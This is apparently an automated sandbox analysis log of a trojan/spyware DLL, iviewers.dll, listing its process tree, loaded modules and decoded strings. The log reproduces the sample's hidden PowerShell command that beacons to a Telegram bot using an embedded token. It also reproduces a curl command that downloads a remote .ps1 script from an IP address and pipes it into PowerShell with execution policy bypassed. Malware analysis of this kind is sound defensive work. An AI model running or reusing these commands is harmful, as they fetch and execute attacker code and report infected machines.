            Source: 37.2.powershell.exe.5718fd0.2.raw.unpack, Ntilg.csCryptographic APIs: 'TransformFinalBlock'
            Source: 24.2.powershell.exe.4df8240.3.raw.unpack, ClasserPlus.csBase64 encoded string: 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'
            Source: 27.2.powershell.exe.574883c.1.raw.unpack, ClasserPlus.csBase64 encoded string: 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'
            Source: 29.2.powershell.exe.5886eb4.3.raw.unpack, ClasserPlus.csBase64 encoded string: 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'
            Source: 29.2.powershell.exe.8b30000.5.raw.unpack, ClasserPlus.csBase64 encoded string: 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'
            Source: xyq5akbp.dll.32.dr, ClasserPlus.csBase64 encoded string: 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'
            Source: 1yj35v5c.dll.33.dr, ClasserPlus.csBase64 encoded string: 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'
            Source: wzlesmvi.dll.34.dr, ClasserPlus.csBase64 encoded string: 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDLL@90/42@2/3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_00432070 CoCreateInstance,45_2_00432070
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4484:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5304:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7692:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6692:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w5ultme0.dys.ps1
            Source: iviewers.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\iviewers.dll,DllRegisterServer
            Source: iviewers.dllReversingLabs: Detection: 47%
            Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\iviewers.dll"
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\iviewers.dll,DllRegisterServer
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.cmdline"
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF461.tmp" "c:\Users\user\AppData\Local\Temp\wzlesmvi\CSC11B817DA9D55460CBF45133E7BAA649F.TMP"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF463.tmp" "c:\Users\user\AppData\Local\Temp\1yj35v5c\CSC1D664DFBC1CF4D3B97F036955FDEE5EE.TMP"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF462.tmp" "c:\Users\user\AppData\Local\Temp\xyq5akbp\CSC3C74FAAA7254A90B38FFB13CA21DCB4.TMP"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES374.tmp" "c:\Users\user\AppData\Local\Temp\3vvszjlk\CSC1C049BEBEBAF4B45B9D79F1CA1976831.TMP"
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\iviewers.dll,DllRegisterServer
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1
            Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
            Source: C:\Windows\System32\loaddll32.exe Section loaded: apphelp.dll
            Source: C:\Windows\System32\loaddll32.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: aclayers.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc_os.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
